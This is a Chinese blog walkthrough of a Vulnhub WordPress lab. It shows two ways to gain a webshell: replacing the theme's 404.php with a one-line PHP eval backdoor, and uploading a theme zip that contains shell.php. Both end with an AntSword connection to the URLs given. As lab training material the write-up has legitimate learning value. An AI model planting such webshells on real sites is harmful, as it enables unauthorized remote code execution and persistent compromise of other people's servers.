当前位置: 首页 > news >正文

Vulnhub-wordpress通关攻略

news 来源:原创 2025/5/10 10:23:15

        姿势一、后台修改模板拿WebShell

        第一步:进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....

        第二步:找到外观--编辑--404.php,将原内容删除并修改为一句话木马,点击更新--File edited successfully.

<?php eval($_POST[cmd]);?>
        第三步:找到404.php的路径,使用蚁剑进行连接

#URL地址
http://47.103.81.25:8080/wp-content/themes/twentyfifteen/404.php

        姿势二、上传主题拿WebShell

        第一步:找到外观--主题--添加--上传主题--浏览---现在安装

        第二步:在网站上搜索WordPress主题免费下载,将后门文件shell.php加入后压缩为webshell.zip文件,上传

        第三步:使用蚁剑进行连接

http://47.103.81.25:8080/wp-content/themes/webshell/shell.php

                                                                                                                                FROM  IYU_

相关文章:

  • CentOS系类普通挂载磁盘挂载命令
  • 云上 Redis 迁移至本地机房
  • Kafka consumer_offsets 主题深度剖析
  • LabVIEW运动控制(二):EtherCAT运动控制器的多轴示教加工应用(下)
  • npm 命令使用文档
  • 如何在PDF中嵌入数据
  • Excel处理控件Spire.XLS系列教程:C# 在 Excel 中添加或删除单元格边框
  • 【RabbitMQ】RabbitMQ如何保证消息不丢失?
  • sqlite3
  • Linux 音频驱动 WM8960 音频 DAC IC 音乐播放与录音
  • 第四周日志-用网络请求理解bp(2)
  • 华为OD机试-会议室占用时间段(Java 2024 C卷 100分)
  • Rust语言学习
  • 体育直播视频源格式解析:M3U8 vs FLV
  • mysql中find_in_set()函数用法详解及增强函数
  • mysql-DELETE、DROP 和 TRUNCATE区别
  • deepSpeed多机多卡训练服务器之间,和服务器内两个GPU是怎么通信
  • Linux 系统性能优化高级全流程指南
  • 免费开源的NAS解决方案:TrueNAS
  • 工厂方法模式、简单工厂模式与抽象工厂模式的对比
  • 第四轮伊美核谈判将于11日在阿曼举行
  • 马克思主义理论研究教学名师系列访谈|董雅华:让学生感知马克思主义理论存在于社会生活中
  • 纪念|古文字学泰斗裘锡圭:“还有很多事情要做”
  • 复旦大学文科杰出教授裘锡圭逝世,享年90岁
  • 胖东来发布和田玉、翡翠退货说明:不扣手续费等任何费用
  • 司法部:持续规范行政执法行为,加快制定行政执法监督条例